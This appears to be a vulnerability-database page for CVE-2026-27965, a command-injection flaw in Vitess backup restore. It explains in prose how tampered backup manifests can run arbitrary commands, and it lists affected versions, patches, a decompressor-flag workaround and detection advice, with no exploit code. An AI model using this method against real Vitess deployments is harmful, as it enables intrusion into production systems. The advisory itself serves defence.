CVE-2026-27965
published 2026-02-26CVE-2026-27965: Vitess is a database clustering system for horizontal scaling of MySQL. Prior to versions 23.0.3 and 22.0.4, anyone with read/write access to the backup…
PriorityP268critical9.9CVSS 3.1
AVNACLPRLUINSCCHIHAH
EPSS
0.42%
33.4th percentile
Vitess is a database clustering system for horizontal scaling of MySQL. Prior to versions 23.0.3 and 22.0.4, anyone with read/write access to the backup storage location (e.g. an S3 bucket) can manipulate backup manifest files so that arbitrary code is later executed when that backup is restored. This can be used to provide that attacker with unintended/unauthorized access to the production deployment environment — allowing them to access information available in that environment as well as run any additional arbitrary commands there. Versions 23.0.3 and 22.0.4 contain a patch. Some workarounds are available. Those who intended to use an external decompressor then can always specify that decompressor command in the `--external-decompressor` flag value for `vttablet` and `vtbackup`. That then overrides any value specified in the manifest file. Those who did not intend to use an external decompressor, nor an internal one, can specify a value such as `cat` or `tee` in the `--external-decompressor` flag value for `vttablet` and `vtbackup` to ensure that a harmless command is always used.
Affected
10 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| linuxfoundation | vitess | < 22.0.4 | 22.0.4 |
| linuxfoundation | vitess | >= 23.0.0 < 23.0.3 | 23.0.3 |
| msrc | azl3_vitess_19.0.4-7_on_azure_linux_3.0 | — | — |
| msrc | azl3_vitess_19.0.4-9_on_azure_linux_3.0 | — | — |
| msrc | cbl2_vitess_17.0.7-14_on_cbl_mariner_2.0 | — | — |
| vitess.io | vitess | >= 0 < 0.22.4 | 0.22.4 |
| vitess.io | vitess | 0 – 0.23.2 | — |
| vitess.io | vitess | >= 0.23.0 < 0.23.3 | 0.23.3 |
| vitessio | vitess | < 22.0.4 | 22.0.4 |
| vitessio | vitess | — | — |
Detection & IOCsextracted from sources · hover to see the quote
- →Monitor for unexpected or modified backup manifest files in backup storage locations (e.g. S3 buckets) used by Vitess, as attackers with read/write access can manipulate these files to inject arbitrary commands executed at restore time. ↗
- →Alert on unexpected or attacker-controlled values in the external decompressor field of Vitess backup manifest files, as this field can be weaponized to execute arbitrary commands during backup restoration. ↗
- →Audit `vttablet` and `vtbackup` process invocations for unexpected `--external-decompressor` flag values or child processes spawned during backup restore operations, which may indicate exploitation of a tampered manifest. ↗
- ·Versions prior to 23.0.3 and 22.0.4 are vulnerable; patched versions override the manifest-specified decompressor with the operator-supplied `--external-decompressor` flag, preventing arbitrary command injection. ↗
- ·If no external decompressor is intended, operators should explicitly set `--external-decompressor` to a safe no-op command (e.g. `cat` or `tee`) on both `vttablet` and `vtbackup` to neutralize any malicious value embedded in a backup manifest. ↗
CVSS provenance
nvdv3.19.9CRITICALCVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
nvdv4.08.4HIGHCVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:H/VI:H/VA:L/SC:L/SI:L/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
vendor_msrc8.4HIGH
Stop checking back — get the weekly exploitation signal.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
OSV
Vitess users can gain unauthorized access to production deployment environments in vitess.io/vitess
osv·2026-03-10
CVE-2026-27965 Vitess users can gain unauthorized access to production deployment environments in vitess.io/vitess
Vitess users can gain unauthorized access to production deployment environments in vitess.io/vitess
Vitess users with backup storage access can gain unauthorized access to production deployment environments in vitess.io/vitess
GHSA
Vitess users with backup storage access can gain unauthorized access to production deployment environments
ghsa·2026-02-26
CVE-2026-27965 [HIGH] CWE-78 Vitess users with backup storage access can gain unauthorized access to production deployment environments
Vitess users with backup storage access can gain unauthorized access to production deployment environments
### Impact
Any user with read/write access to the backup storage location (e.g. an S3 bucket) can manipulate backup manifest files so that arbitrary code is later executed when that backup is restored. This can be used to provide that attacker with unintended/unauthorized access to the production deployment environment — allowing them to access information available in that environment as well as run any additional arbitrary commands there.
### Patches
Fixes are expected to be released with versions v23.0.3 and v22.0.4
See fix commit at https://github.com/vitessio/vitess/commit/4c0173293907af9cb942a6683c465c3f1e9fdb5c
### Workarounds
If maintainers *intended* to use an external d
OSV
Vitess users with backup storage access can gain unauthorized access to production deployment environments
osv·2026-02-26
CVE-2026-27965 [HIGH] Vitess users with backup storage access can gain unauthorized access to production deployment environments
Vitess users with backup storage access can gain unauthorized access to production deployment environments
### Impact
Any user with read/write access to the backup storage location (e.g. an S3 bucket) can manipulate backup manifest files so that arbitrary code is later executed when that backup is restored. This can be used to provide that attacker with unintended/unauthorized access to the production deployment environment — allowing them to access information available in that environment as well as run any additional arbitrary commands there.
### Patches
Fixes are expected to be released with versions v23.0.3 and v22.0.4
See fix commit at https://github.com/vitessio/vitess/commit/4c0173293907af9cb942a6683c465c3f1e9fdb5c
### Workarounds
If maintainers *intended* to use an external d
Microsoft
Vitess users with backup storage access can gain unauthorized access to production deployment environments
vendor_msrc·2026-02-10·CVSS 8.4
CVE-2026-27965 [HIGH] CWE-78 Vitess users with backup storage access can gain unauthorized access to production deployment environments
Vitess users with backup storage access can gain unauthorized access to production deployment environments
Mariner: Mariner
GitHub_M: GitHub_M
Customer Action Required: Yes
Remediation: CBL-Mariner Releases
Reference: https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade
No detection rules found.
No public exploits indexed.
2026-02-26
Published